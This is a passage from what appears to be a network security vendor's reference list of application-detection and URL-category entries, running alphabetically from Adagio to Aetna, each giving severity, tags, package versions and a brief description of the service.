Description: Adagio Financial Suite made for companies with high transaction volume, modules include GL, AR, AP, POS, payroll, job costing, time and billing, reports.
Back to top

Adallom

About this situation: Application Adallom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Adallom is a cloud access security broker delivering governance and protection for SaaS applications.
Back to top

ADAM-cargigi.com

About this situation: Application ADAM-cargigi.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cargigi is provider of advertising and marketing services on the Internet's most popular free classified websites.
Back to top

ADAM-Environmental-Management

About this situation: Application ADAM-Environmental-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ADAM organizes and provides access to the locations of hazardous materials in buildings.
Back to top

Adap.tv

About this situation: Adap.tv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Adap.tv is an online video advertising platform.
Back to top

Adaptive-Insights

About this situation: Application Adaptive-Insights detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Adaptive Insights is the cloud corporate performance management. It helps financial and operational leaders to manage, intelligence and control, enabling them to develop and execute plans and strategies.
Back to top

Adblade

About this situation: Adblade usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Adblade is a content recommendation platform which is owned by Adiant. Adblade has advertising arrangements chiefly with highly trafficked content providers, websites in its network have included Nasdaq, Hearst, McClatchy Newspapers, The Washington Times, ABC News and Chicago Sun Times.
Back to top

Adcash

About this situation: Adcash usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Description: Adcash is an advertising platform.
Back to top

AdClarity

About this situation: Application AdClarity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AdClarity is a Marketing Intelligence Tool for Advertisers, Agencies, Publishers, Ad Networks to optimize display advertising campaigns.
Back to top

Adcolony

About this situation: AdColony usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: This service provides development of mobile video advertising and monetization.
Back to top

Adconion-Media-Group

About this situation: Application Adconion-Media-Group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AMG is a technology company who has built one of the largest global multi-screen, multi-channel audience platforms.
Back to top

Adcore

About this situation: Application Adcore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: adCore is a SEM automation software that helps PPC professionals Manage and Optimize.
Back to top

AdDataExpress

About this situation: Application AdDataExpress detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Advertising Database who buying and selling media, marketing, promotional, and creative services
Back to top

Addictinggames

About this situation: Addictinggames usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Addison-Lee

About this situation: Application Addison-Lee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Addison Lee helps to book a minicab, book online or download the app.
Back to top

AddReality

About this situation: Application AddReality detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AddReality is cloud-based Digital Signage platform, enabling enterprises worldwide to create, edit, manage and deploy digital content.
Back to top

AddressTwo

About this situation: Application AddressTwo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AddressTwo delivers sales and marketing solutions for small businesses and entrepreneurs.
Back to top

AddThis

About this situation: AddThis usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-630-5211
Description: AddThis is a content sharing platform.
Back to top

AdElement

About this situation: Application AdElement detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AdElement is a self-service web platform focused on making online display advertising quick, easy and profitable.
Back to top

AdeptCRMSales

About this situation: Application AdeptCRMSales detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AdeptCRMSales is cloud based CRM software for managing your sales, marketing, customer support, and inventory.
Back to top

Adeptia

About this situation: Application Adeptia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Adeptia is an enterprise software company providing integration technology that automates business processes and data flows.
Back to top

Adesso

About this situation: Application Adesso detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Adesso provide solutions to optimize core business processes through the targeted use of modern IT. Adesso combine technological expertise with a strong technical and business know-how. With over 1,100 employees and ten main locations Adesso are working as one of the leading IT service providers in the German-speaking countries every day to bring our clients' projects successfully to its destination.
Back to top

Adexa

About this situation: Application Adexa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Adexa delivers intelligent enterprise business planning and performance management solutions that link strategic planning, financial planning and supply chain planning. In this synchronized environment, the financial impact of planning decisions, and their ramifications on the enterprise, are known in advance to ensure profitable decisions are made every time.
Back to top

AdForm

About this situation: AdForm usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-628-5211
Description: AdForm is an on-line advertising service.
Back to top

Adilas

About this situation: Application Adilas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Adilas a real-time data portal that specializes in business operations
Back to top

ADIOS-Business-Suite

About this situation: Application ADIOS-Business-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ADIOS Business Suite is an all-in-one business automation software for small and medium businesses.
Back to top

Aditi

About this situation: Application Aditi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aditi Technologies is a Systems of Engagement integrator. Aditi has helped over 150 companies run and transform their business with cloud platforms like Windows Azure, Amazon Web Services and SalesForce.com. Enterprises, e-businesses and ISV customers leverage Aditi to help them build customer facing systems, built using cloud infrastructure and platforms and designed for engaging customer and user experience. Aditi has been recognized as one of the Top 3 Microsoft Cloud Partner for three years in a row and voted as a Top 10 IT Workplace by the Great Place to Work Institute.
Back to top

Adition

About this situation: Adition usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-708-5211
Description: Adition is a web advertisement platform
Back to top

Aditro

About this situation: Aditro usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Description: Aditor is a service provider for recruitment and human resources.
Back to top

AdlandPro

About this situation: Application AdlandPro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AdlandPro is an active and dynamic social community, where people can come in for the social interactions,
Back to top

adMarketplace.com

About this situation: Application adMarketplace.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: adMarketplace is an advertising technology company, operates the search network outside of Google and Yahoo
Back to top

Admation

About this situation: Application Admation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Admation - agency management software to help manage resources and creative projects and streamline the online approval workflow
Back to top

Administrate

About this situation: Application Administrate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Administrate is a cloud-based training management, learning management and online course booking system, built just for training providers.
Back to top

Administration123

About this situation: Application Administration123 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Administration123.com is an online CRM billing solution to manage your sales processes, customer service, marketing and partner programs.
Back to top

Adminitrack

About this situation: AdminiTrack usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: AdminiTrack is more than an issue-tracking tool. It is also a project management tool and a communication tool all rolled into one.
Back to top

ADmira-Mobi

About this situation: Application ADmira-Mobi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ADmira Digital Signage is the definitive Digital Signage Software for broadcast, control and management of digital content.
Back to top

AdNgin

About this situation: Application AdNgin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AdNgin transforms the way publishers monetize their website traffic. AdNgin utilizes its proprietary algorithm to automatically bandit test many monetization channels for optimal revenue and visitor experience.
Back to top

Adnstream-TV

About this situation: Adnstream TV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Adnstream TV is a web-based online TV video service in Spain.
Back to top

Adobe ARM

About this situation: Endpoint Context Agent based Adobe ARM detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: Adobe ARM endpoint application has been detected. Adobe ARM, also known as Adobe Reader and Acrobat Manager, is an autoupdate utility for Adobe Reader and Acrobat.
Back to top

Adobe Creative Cloud

About this situation: Endpoint Context Agent based Adobe Creative Cloud
Context: EI Correlation
Severity: 1
Tags: Productivity, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1568-5242
Description: Adobe Creative Cloud endpoint application has been detected.
Back to top

Adobe Digital Editions

About this situation: Endpoint Context Agent based Adobe Digital Editions detection
Context: EI Correlation
Severity: 1
Tags: Productivity, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: Adobe Digital Editions endpoint application has been detected. Digital Editions is a digital rights management (DRM) enabled eBook reader.
Back to top

Adobe Download Manager

About this situation: Endpoint Context Agent based Adobe Download Manager detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Adobe Download Manager endpoint application has been detected.
Back to top

Adobe Flash Player Installer

About this situation: Endpoint Context Agent based Adobe Flash Player Installer detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Adobe Flash Player Installer endpoint application has been detected.
Back to top

Adobe Flash Player Updater

About this situation: Endpoint Context Agent based Adobe Flash Player Updater detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: Adobe Flash Player Updater endpoint application has been detected.
Back to top

Adobe Reader

About this situation: Endpoint Context Agent based Adobe Reader detection
Context: EI Correlation
Severity: 1
Tags: Productivity, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1568-5242
Description: Adobe Reader endpoint application has been detected.
Back to top

Adobe-Acrobat

About this situation: Application Adobe-Acrobat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Adobe Acrobat is a family of application software and web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format.
Back to top

Adobe-Business-Catalyst

About this situation: Application Adobe-Business-Catalyst detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Adobe Business Catalyst delivers business websites and online stores to clients with hosted solution, built for web designers.
Back to top

Adobe-Connect

About this situation: Adobe Connect usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1706-5242
Description: This aplication is used to share information, create presentations and online training materials, perform web conferencing, and provide desktop sharing. Source: Wikipedia
Back to top

Adobe-Creative-Cloud

About this situation: Adobe Creative Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1706-5242
Description: This service allows user to access, create, view, and share creative files saved in Adobe Creative Cloud from most Internet-connected devices. Source: Wikipedia
Back to top

Adobe-DTM

About this situation: Adobe Dynamic Tag Management usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-773-5211
Description: Adobe Dynamic Tag Management is a tool for managing e-marketing tags on a website.
Back to top

Adobe-EchoSign

About this situation: Adobe EchoSign usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1706-5242
Description: Adobe EchoSign is an online application that allows users to electronically sign documents. The web application can be accessed using a browser at site: www.echosign.adobe.com.
Back to top

Adobe-Marketing-Cloud

About this situation: Adobe Markiting Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1374-5242
Description: Adobe Marketing Cloud is an on-line advertising service.
Back to top

Adobe-Revel

About this situation: Adobe Revel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-706-5211
Last changed: sgpkg-ips-706-5211
Description: Adobe Revel is a service for storing and sharing photos and videos.
Back to top

Adobe-RTMP

About this situation: Real-Time Messaging Protocol (RTMP) usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Media
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-628-5211
Description: RTMP is a proprietary streaming protocol used by Adobe Flash.
Back to top

Adobe-Scene7

About this situation: Adobe Scene7 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-773-5211
Description: Scene7, a subsdiary of Adobe Systems, is a company that provides document hosting and interactive publishing services.
Back to top

Adobe-Systems

About this situation: Adobe usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1706-5242
Description: Adobe Systems is an America computer software company. It is a producer of various multimedia and creative software products.
Back to top

Adobe-Typekit

About this situation: Adobe Typekit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-773-5211
Description: Adobe Typekit font and typographic service usage has been detected.
Back to top

Adobe-Updater

About this situation: Adobe Updater usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1638-5242
Description: Adobe Updater is a version and patch management application installed along with many Adobe products. The application check for updates of installed Adobe product and install them. The update process can be set to run automatically or manually.
Back to top

ADP

About this situation: ADP usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This collection provides users with payroll services, HR services, and human capital management services. Source: Wikipedia
Back to top

AdParlor

About this situation: Application AdParlor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AdParlor is a video and social advertising platform for Facebook, Twitter, Instagram, Premium Video, Pinterest, and Tumblr.
Back to top

AdReady

About this situation: Application AdReady detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AdReady helps hundreds of advertisers, agencies and publishers generate breakthrough results by creating, managing and optimizing thousands of small online display campaigns more cost effectively than any other solution.
Back to top

ADrive

About this situation: ADrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-628-5211
Description: ADrive provides online cloud storage and backup solutions for personal, business and enterprise-level data.
Back to top

AdRoll

About this situation: AdRoll usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: AdRoll is a web advertisement and statistic collection service.
Back to top

Adspeed

About this situation: AdSpeed usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: AdSpeed serve ads, track impressions, clicks, revenue, conversions and report ad statistics in real-time.
Back to top

Adssets

About this situation: Adssets usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-1764-5242
Description: Addsets is a Swedish online advertisement and market intelligence company.
Back to top

AdStage

About this situation: Application AdStage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AdStage is a sowtware to Report and Optimize your ad campaigns across Google Adwords, Bing Ads, Facebook Ads, Twitter Ads, and LinkedIn ads in one PPC platform.
Back to top

Adstation

About this situation: AdStation usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: AdStation is the email channel by Adknowledge for email advertising and data monetization.
Back to top

ADSTRA-Dental-Software-Suite

About this situation: Application ADSTRA-Dental-Software-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ADSTRA Dental Software offers an integrated solution with a user-friendly interface and tools for managing all aspects of patient care.
Back to top

Adult Content

About this situation: Sites that display full or partial nudity in a sexual context, but not sexual activity; erotica; sexual paraphernalia; sex-oriented businesses including clubs, nightclubs, escort services; and sites supporting the online purchase of such goods and services.
Context: URL Application Context
Severity: 1
Tags: Adult Material, Legal Liability, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that display full or partial nudity in a sexual context, but not sexual activity; erotica; sexual paraphernalia; sex-oriented businesses including clubs, nightclubs, escort services; and sites supporting the online purchase of such goods and services.
Back to top

Adult Material

About this situation: Parent category that contains adult-oriented categories; may also contain age-restricted content.
Context: URL Application Context
Severity: 1
Tags: Adult Material, Legal Liability, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Parent category that contains adult-oriented categories; may also contain age-restricted content.
Back to top

Advanced Malware Command and Control

About this situation: Protects against outbound transmissions from a compromised machine to a malicious command-and-control center.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Protects against outbound transmissions from a compromised machine to a malicious command-and-control center.
Back to top

Advanced Malware Payloads

About this situation: Protects against inbound network transmissions of payloads intended to exploit a machine.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Protects against inbound network transmissions of payloads intended to exploit a machine.
Back to top

Advanced-Caller

About this situation: Application Advanced-Caller detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Advanced Caller provides cloud computing-based phone systems for call centers. Identify phone numbers with Next Caller's caller data. Instantly obtain the name, address, email, gender, and 12 other points of demographic data from inbound calls.
Back to top

Advancedcomputersoftware

About this situation: Application Advancedcomputersoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Advanced Computer Software Group
Back to top

Advantech

About this situation: Application Advantech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Advantech offers comprehensive system integration, hardware, software, customer-centric design services, embedded systems, automation products, and global logistics support.
Back to top

Advent

About this situation: Application Advent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Advent Software provides portfolio management and accounting systems, straight through processing, and research management software and services to the world's leading asset and wealth management professionals.
Back to top

Advertise.com

About this situation: Application Advertise.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Advertise.com is a platform that enables advertisers to reach an audience through search engines and publisher properties.
Back to top

Advertisements

About this situation: Sites that provide advertising graphics or other ad content files.
Context: URL Application Context
Severity: 1
Tags: Productivity, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide advertising graphics or other ad content files.
Back to top

Advertising.com

About this situation: Advertising.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Advertising.com is an online advertising company.
Back to top

Advertising.com-Report

About this situation: Application Advertising.com-Report detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Advertising.com is an online advertising company.
Back to top

AdvisorFi

About this situation: Application AdvisorFi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Advisorfi.com optimizes business efforts by making intelligence highly accessible, easy to understand, collaborative and user friendly.
Back to top

AdvisorLynx

About this situation: Application AdvisorLynx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Orion Advisor Services, LLC is a complete operational service bureau for the Registered Investment Advisor.
Back to top

Advizor-Analyst

About this situation: Application Advizor-Analyst detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ADVIZOR Analyst is a Microsoft .NET client-based solution that enables business users to visually analyze desktop and enterprise data, create dashboards that can be shared with other ADVIZOR Analyst users, publish dashboards to ADVIZOR Desktop Navigator
Back to top

Advocacy Groups

About this situation: Sites that promote change or reform in public policy, public opinion, social practice, economic activities and relationships.
Context: URL Application Context
Severity: 1
Tags: Advocacy Groups, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that promote change or reform in public policy, public opinion, social practice, economic activities and relationships.
Back to top

Advorto-ATS

About this situation: Application Advorto-ATS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Advorto ATS is a web-based recruitment management and applicant tracking software. Reduce time-to-hire and cost-per-hire Control their entire talent recruitment lifecycle Manage high-volume recruitment Publicise vacancies to social media, agencies and job boards
Back to top

Adxstudio-Portals

About this situation: Application Adxstudio-Portals detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Adxstudio is a provider of web portal and application lifecycle management solutions built for Microsoft Dynamics CRM, SharePoint, Azure and .NET platforms.
Back to top

Adzerk

About this situation: Adzerk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Adzerk is a company specialized in online advertising.
Back to top

Aepona

About this situation: Application Aepona detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aepona Ltd. provides application-led products and services to telecommunications operators worldwide. Its Universal Service Platform allows service creation and implementation to be carried out within the service network from underlying network resources.
Back to top

Aer-Lingus

About this situation: Aer Lingus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Aer Lingus operates a fleet of mostly Airbus aircraft serving Europe, North Africa, Turkey and North America.
Back to top

Aeroadmin

About this situation: Application Aeroadmin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aeroadmin - zero configuration remote desktop software. Use it for remote desktop access and PC control.
Back to top

AeroFS

About this situation: Application AeroFS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AeroFS provides a file sharing service that is completely deployed behind your firewall. Your files remain secured by your own security protocols, removing the risk associated with relying on your vendors to secure your data.
Back to top

Aerohive

About this situation: Application Aerohive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aerohive enterprise network architecture supports identity-based wireless or wired access and enables delivery of mission-critical applications to any user or device, regardless of location in the headquarters or branch office.
Back to top

Aerospike

About this situation: Application Aerospike detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aerospike is an in-memory high performance NoSQL database and key-value store for mission critical apps requiring blazing speed, easy scaling, and no downtime.
Back to top

AeroTrac

About this situation: Application AeroTrac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AeroTrac is a functionally fully integrated Process Control Software which has been developed from the ground-up specifically for the Aviation MRO industry.
Back to top

AeroTrakr

About this situation: Application AeroTrakr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AeroTrakr is an internet based aircraft maintenance and inspection e-logbooks, due lists and AD compliance database.
Back to top

Aestiva-Purchase-Order

About this situation: Application Aestiva-Purchase-Order detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aestiva Software is a computer technology corporation that develops, manufactures, and licenses business process automation software products.
Back to top

AetherStore

About this situation: Application AetherStore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AetherStore is a software-only data storage solution that pools together unused space on your workstation hard drives to create a shared, distributed storage network.
Back to top

Aetna

About this situation: Application Aetna detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aetna, Inc. sells traditional and consumer directed health care insurance plans and related services, such as medical, pharmaceutical, dental, behavioral health, long-term care, and disability plans.
Back to top

